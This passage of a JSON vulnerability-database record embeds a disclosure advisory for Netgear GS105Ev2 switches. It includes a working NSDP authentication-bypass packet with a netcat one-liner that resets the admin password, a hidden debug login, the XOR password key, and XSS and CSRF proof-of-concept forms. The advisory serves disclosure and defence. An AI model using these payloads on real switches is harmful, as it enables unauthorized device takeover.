importance:\n\nType 0x0009 - write password\nType 0x9400 - unknown, but seems to indicate that no authentication is performed. \n\nBy sending the following payload to the port 63322 to the IP of the GS105Ev2 switch, the password is changed to \"test\". \n\n\t|version|type|result|reserved |src-mac |dst-mac \n\t 01: 03 : 00:00: 00:00:00:00:3c:97:0e:ee:98:eb:c0:ff:d4:ba:61:fc:\n\t\n\t|reserved|Sig. (NSDP) |TLV-type0x9400|TLV-type 0x0009 | Trailer \n\t 00:00:00:78:4e:53:44:50:94:00:00:00:00:09:00:04:3a:11:14:06:ff:ff:00:00\n\nHereby, the following part is of importance:\n\t94:00:00:00:00:09:00:04:3a:11:14:06\n\nThe TLV 94:00:00:00 indicates a packet of type 94 with no payload. This followed by the TLV 00:09:00:04:3a:11:14:06. 0x0009 is the type \"password change\", 0x0004 is\nthe length of the password, and 3a:11:14:06 is the \"encrypted\" password that is about to be set. 
The \"encryption\" of the password is done by XORing the password with \nthe string \"NtgrSmartSwitchRock\". If the password is longer than the secret, the secret is used again. \n\nIn case, the password has successfully be set, the switch replies with the following message:\n\t01:04:00:00:00:00:00:00:3c:97:0e:ee:98:eb:c0:ff:d4:ba:61:fc:00:00:00:78:4e:53:44:50:00:00:00:00\n\nIf the message starts with this prefix 01:04:00:00, the password was changed successfully. This enables an attacker to gain access to the following configuration interfaces:\n- Web interface HTTP://\u003cip-of-switch\u003e/login.cgi\n- Webinterface http://\u003cip-of-switch\u003e/loginhidden.cgi with user: Admin1NtgrDebugUser (e.g.:\n - http://\u003cip-of-switch\u003e/bootcode_update.cgi\n - http://\u003cip-of-switch\u003e/produce_burn.cgi )\n- Netgear Configuration utility\n\nWith this, the configuration can be changed, e.g., enabling a monitoring port, or flashing a new firmware. \n\nThe following bash script can be used to change the password to test:\n\n\techo \"Please enter IP of switch:\"; read ip; echo \"\";echo \"Please enter MAC of switch (e.g. de:ad:de:ad:be:ef) :\"; read mac; echo \"01:03:00:00:00:00:00:00:3c:97:0e:ee:98:eb:c0:ff:d4:ba:61:fc:00:00:00:78:4e:53:44:50:94:00:00:00:00:09:00:04:3a:11:14:06:ff:ff:00:00\" | sed \"s/c0:ff:d4:ba:61:fc/$mac/g;s/://g\" | xxd -r -p | nc -q 0 -b -u $ip 63322\n\n\nFor a switch with the IP 192.168.0.239 and the MAC c0:ff:d4:ba:61:fc, the output (and input) would look like this:\n\n\tPlease enter IP of switch:\n\t192.168.0.239\n\n\tPlease enter MAC of switch (e.g. de:ad:de:ad:be:ef) :\n\tc0:ff:d4:ba:61:fc\n\nIf the password is not changed, reboot the switch as this little bash script does not regard the SEQ number. \n\nIt should be noted that the authentication bypass is not limited to the \"set password\" function. Other write functions are also affected by this vulnerability. 
\n\nPlease note that the \"encryption\" scheme for the password is broken. The encryption string can easily be recovered by a simple XOR operation on a known password (NtgrSmartSwitchRock). Thus, an attacker within the broadcast domain can eavesdrop and decode the password. This fact was already noted in [Security by Obscurity bei Netgear Switches]. \n\n[Security by Obscurity bei Netgear Switches]: - http://www.linux-magazin.de/Blogs/Insecurity-Bulletin/Gastbeitrag-Security-by-Obscurity-bei-Netgear-Switches \n\n\n## Multiple Vulnerabilities in Web-Interface\n\nThough we did not perform a full analysis of the web interface, we noticed that the web interface is prone to several vulnerabilities, i.e., XSS, CSRF, and insufficient protection of the password. \n\n\n### Detailed Description of the Vulnerabilities\n\n#### XSS\n\nWe noticed that the web interface does not properly encode the output. This allows reflected Cross-Site Scripting attacks. The issue can be reproduced with the following request:\n\n\tPOST /switch_info.cgi HTTP/1.1\n\tHost: 192.168.0.239\n\tCookie: SID=EwTVdG\\BCCCo\\fNUhte]iXsr_psjq^hNdwr\\RSXkduf[OXpsveZAeyIp_xx[wFmKdp_ijDDqABZrjlBH\n\tContent-Type: application/x-www-form-urlencoded\n\tContent-Length: 110\n\n\tswitch_name=\u0027onclick=alert(1)\u0026dhcpMode=0\u0026ip_address=\u0027\u003e\u003cScript\u003ealert(\u0026subnet_mask=1)\u003c/script\u003e\u0027\u0026gateway_address=\n\nAlternatively, the following HTML-document can be opened to trigger the XSS. 
\n\n\t\u003chtml\u003e\n\t \u003cbody\u003e\n\t\t\u003cform action=\"http://192.168.0.239/switch_info.cgi\" method=\"POST\"\u003e\n\t\t \u003cinput type=\"hidden\" name=\"switch\u0026#95;name\" value=\"Blubb\" /\u003e\n\t\t \u003cinput type=\"hidden\" name=\"dhcpMode\" value=\"0\" /\u003e\n\t\t \u003cinput type=\"hidden\" name=\"ip\u0026#95;address\" value=\"\u0026apos;\u0026gt;\u0026lt;Script\u0026gt;alert\u0026#40;\" /\u003e\n\t\t \u003cinput type=\"hidden\" name=\"subnet\u0026#95;mask\" value=\"1\u0026#41;\u0026lt;\u0026#47;script\u0026gt;\u0026apos;\" /\u003e\n\t\t \u003cinput type=\"hidden\" name=\"gateway\u0026#95;address\" value=\"\" /\u003e\n\t\t \u003cinput type=\"submit\" value=\"Submit request\" /\u003e\n\t\t\u003c/form\u003e\n\t \u003c/body\u003e\n\t\u003c/html\u003e\n\nThe following fields are affected: IP-Adresse, Netmask, Gateway Address. \n\n\n#### CSRF\n\nIn addition, the web application has no protection against Cross-Site request forgery attacks. With the following PoC, the problem can be reproduced:\n\n\t\u003chtml\u003e\n\t \u003cbody\u003e\n\t\t\u003cform action=\"http://192.168.0.239/switch_info.cgi\" method=\"POST\"\u003e\n\t\t \u003cinput type=\"hidden\" name=\"switch\u0026#95;name\" value=\"CSRF\" /\u003e\n\t\t \u003cinput type=\"hidden\" name=\"dhcpMode\" value=\"0\" /\u003e\n\t\t \u003cinput type=\"hidden\" name=\"ip\u0026#95;address\" value=\"192\u0026#46;168\u0026#46;0\u0026#46;239\" /\u003e\n\t\t \u003cinput type=\"hidden\" name=\"subnet\u0026#95;mask\" value=\"255\u0026#46;255\u0026#46;255\u0026#46;0\" /\u003e\n\t\t \u003cinput type=\"hidden\" name=\"gateway\u0026#95;address\" value=\"192\u0026#46;168\u0026#46;0\u0026#46;1\" /\u003e\n\t\t \u003cinput type=\"submit\" value=\"Submit request\" /\u003e\n\t\t\u003c/form\u003e\n\t \u003c/body\u003e\n\t\u003c/html\u003e\n\n#### Password Disclosure\n\nMoreover, the backup file of the configuration stores the password in plain, when the web interface is used to create the configuration (fixed 
with 1.4.0.2). The password, secretPass, is stored in plaintext in the configuration file:\n \n\thexdump -C GS105Ev2.cfg\n\t00000000 23 79 23 79 00 c0 a8 00 ef ff ff ff 00 c0 a8 00 |#y#y............|\n\t00000010 01 00 00 00 00 00 00 61 64 6d 69 6e 00 00 00 00 |.......admin....|\n\t00000020 73 65 63 72 65 74 50 61 73 73 00 00 00 00 00 00 |secretPass......|\n\t00000030 00 00 00 00 00 00 0f ff f8 00 0f ff f8 00 0f ff |................|\n\t00000040 f8 00 0f ff f8 00 0f ff f8 00 0f ff f8 00 0f ff |................|\n\nCVE-2014-4864 describes the problem for the NSDP protocol. \n\n\n#### Predictable Cookies\n\nAnother issue is represented by the session ID which seems to be predictable and related to uptime of the switch. After the first login within a minute after power-on, the following session id is set by the switch. For each new login request, the switch was disconnected from the power supply and reconnected. After some time, the ID changes again. \n\n\n##### Request 1\n\n\tPOST /login.cgi HTTP/1.1\n\tHost: 192.168.0.239\n\tContent-Type: application/x-www-form-urlencoded\n\tContent-Length: 13\n\n\tpassword=test\n\n\n##### Response 1\n\n\n\tHTTP/1.1 200 OK\n\tConnection: close\n\tContent-Type: text/html\n\tSet-Cookie: SID=EwTVdG\\BCCCo\\fNUhte]iXsr_psjq^hNdwr\\RSXkduf[OXpsveZAeyIp_xx[wFmKdp_ijDDqABZrjlBH;PATH=/\n\tContent-Length: 3454\n\n##### Request 2\n\n\tPOST /login.cgi HTTP/1.1\n\tHost: 192.168.0.239\n\tContent-Type: application/x-www-form-urlencoded\n\tContent-Length: 13\n\n\tpassword=walla\n\n\n##### Response 2\n\n\tHTTP/1.1 200 OK\n\tConnection: close\n\tContent-Type: text/html\n\tSet-Cookie: SID=EwTVdG\\BCCCo\\fNUhte]iXsr_psjq^hNdwr\\RSXkduf[OXpsveZAeyIp_xx[wFmKdp_ijDDqABZrjlBH;PATH=/\n\tContent-Length: 3454\n\n##### Request 3\n\n\tPOST /login.cgi HTTP/1.1\n\tHost: 192.168.0.239\n\tContent-Type: application/x-www-form-urlencoded\n\tContent-Length: 13\n\n\tpassword=secretPass\n\n\t\n##### Response 3\n\n\tHTTP/1.1 200 OK\n\tConnection: close\n\tContent-Type: 
text/html\n\tSet-Cookie: SID=EwTVdG\\BCCCo\\fNUhte]iXsr_psjq^hNdwr\\RSXkduf[OXpsveZAeyIp_xx[wFmKdp_ijDDqABZrjlBH;PATH=/\n\tContent-Length: 3454\n\n\n\t\n## Fixed Versions\n\nNo updates are currently available. \n\nPassword Disclosure:\nFixed in version 1.4.0.2\n\n\n## History\n\n10.08.2015 - Initial contact to Netgear via support chat\n10.08.2015 - Set preliminary disclosure date\n11.08.2015 - Netgear Support confirms findings\n01.09.2015 - Netgear Support informs that currently no immediate plans exist to fix the issues\n27.01.2016 - Public disclosure\n\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2014-4864"
},
{
"db": "CERT/CC",
"id": "VU#396212"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-004071"
},
{
"db": "CNVD",
"id": "CNVD-2014-05497"
},
{
"db": "BID",
"id": "69666"
},
{
"db": "VULHUB",
"id": "VHN-72805"
},
{
"db": "PACKETSTORM",
"id": "135480"
}
],
"trust": 3.33
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://www.kb.cert.org/vuls/id/396212",
"trust": 0.8,
"type": "unknown"
},
{
"reference": "https://www.scap.org.cn/vuln/vhn-72805",
"trust": 0.1,
"type": "unknown"
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#396212"
},
{
"db": "VULHUB",
"id": "VHN-72805"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "CERT/CC",
"id": "VU#396212",
"trust": 3.6
},
{
"db": "NVD",
"id": "CVE-2014-4864",
"trust": 3.5
},
{
"db": "BID",
"id": "69666",
"trust": 1.0
},
{
"db": "JVN",
"id": "JVNVU95664911",
"trust": 0.8
},
{
"db": "JVNDB",
"id": "JVNDB-2014-004071",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201409-457",
"trust": 0.7
},
{
"db": "OSVDB",
"id": "111228",
"trust": 0.6
},
{
"db": "CNVD",
"id": "CNVD-2014-05497",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "135480",
"trust": 0.2
},
{
"db": "VULHUB",
"id": "VHN-72805",
"trust": 0.1
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#396212"
},
{
"db": "CNVD",
"id": "CNVD-2014-05497"
},
{
"db": "VULHUB",
"id": "VHN-72805"
},
{
"db": "BID",
"id": "69666"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-004071"
},
{
"db": "PACKETSTORM",
"id": "135480"
},
{
"db": "CNNVD",
"id": "CNNVD-201409-457"
},
{
"db": "NVD",
"id": "CVE-2014-4864"
}
]
},
"id": "VAR-201409-0175",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-05497"
},
{
"db": "VULHUB",
"id": "VHN-72805"
}
],
"trust": 1.5790423857142857
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-05497"
}
]
},
"last_update_date": "2025-04-12T23:24:41.748000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "ProSafe Plus Switches FAQ",
"trust": 0.8,
"url": "http://kb.netgear.com/app/answers/detail/a_id/12048/~/prosafe-plus-switches-faq"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2014-004071"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-255",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-72805"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-004071"
},
{
"db": "NVD",
"id": "CVE-2014-4864"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.8,
"url": "http://www.kb.cert.org/vuls/id/396212"
},
{
"trust": 0.8,
"url": "http://kb.netgear.com/app/answers/detail/a_id/12048/~/prosafe-plus-switches-faq"
},
{
"trust": 0.8,
"url": "http://cwe.mitre.org/data/definitions/200.html"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-4864"
},
{
"trust": 0.8,
"url": "http://jvn.jp/vu/jvnvu95664911/index.html"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2014-4864"
},
{
"trust": 0.6,
"url": "http://www.securityfocus.com/bid/69666"
},
{
"trust": 0.6,
"url": "http://osvdb.com/show/osvdb/111228"
},
{
"trust": 0.3,
"url": "http://www.netgear.com"
},
{
"trust": 0.1,
"url": "http://\u003cip-of-switch\u003e/loginhidden.cgi"
},
{
"trust": 0.1,
"url": "http://downloadcenter.netgear.com/de/product/gs105ev2#searchresults"
},
{
"trust": 0.1,
"url": "http://\u003cip-of-switch\u003e/produce_burn.cgi"
},
{
"trust": 0.1,
"url": "http://www.linux-magazin.de/blogs/insecurity-bulletin/gastbeitrag-security-by-obscurity-bei-netgear-switches"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2014-4864"
},
{
"trust": 0.1,
"url": "http://192.168.0.239/switch_info.cgi\""
},
{
"trust": 0.1,
"url": "http://\u003cip-of-switch\u003e/bootcode_update.cgi"
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#396212"
},
{
"db": "CNVD",
"id": "CNVD-2014-05497"
},
{
"db": "VULHUB",
"id": "VHN-72805"
},
{
"db": "BID",
"id": "69666"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-004071"
},
{
"db": "PACKETSTORM",
"id": "135480"
},
{
"db": "CNNVD",
"id": "CNNVD-201409-457"
},
{
"db": "NVD",
"id": "CVE-2014-4864"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CERT/CC",
"id": "VU#396212"
},
{
"db": "CNVD",
"id": "CNVD-2014-05497"
},
{
"db": "VULHUB",
"id": "VHN-72805"
},
{
"db": "BID",
"id": "69666"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-004071"
},
{
"db": "PACKETSTORM",
"id": "135480"
},
{
"db": "CNNVD",
"id": "CNNVD-201409-457"
},
{
"db": "NVD",
"id": "CVE-2014-4864"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2014-09-08T00:00:00",
"db": "CERT/CC",
"id": "VU#396212"
},
{
"date": "2014-09-10T00:00:00",
"db": "CNVD",
"id": "CNVD-2014-05497"
},
{
"date": "2014-09-10T00:00:00",
"db": "VULHUB",
"id": "VHN-72805"
},
{
"date": "2014-09-08T00:00:00",
"db": "BID",
"id": "69666"
},
{
"date": "2014-09-10T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2014-004071"
},
{
"date": "2016-01-28T17:21:57",
"db": "PACKETSTORM",
"id": "135480"
},
{
"date": "2014-09-15T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201409-457"
},
{
"date": "2014-09-10T10:55:08.347000",
"db": "NVD",
"id": "CVE-2014-4864"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2014-09-08T00:00:00",
"db": "CERT/CC",
"id": "VU#396212"
},
{
"date": "2014-09-10T00:00:00",
"db": "CNVD",
"id": "CNVD-2014-05497"
},
{
"date": "2014-09-10T00:00:00",
"db": "VULHUB",
"id": "VHN-72805"
},
{
"date": "2014-09-08T00:00:00",
"db": "BID",
"id": "69666"
},
{
"date": "2014-09-11T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2014-004071"
},
{
"date": "2014-09-15T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201409-457"
},
{
"date": "2025-04-12T10:46:40.837000",
"db": "NVD",
"id": "CVE-2014-4864"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "specific network environment",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201409-457"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Netgear ProSafe Plus Configuration Utility writes out plaintext passwords to backup configuration files",
"sources": [
{
"db": "CERT/CC",
"id": "VU#396212"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "trust management",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201409-457"
}
],
"trust": 0.6
}
}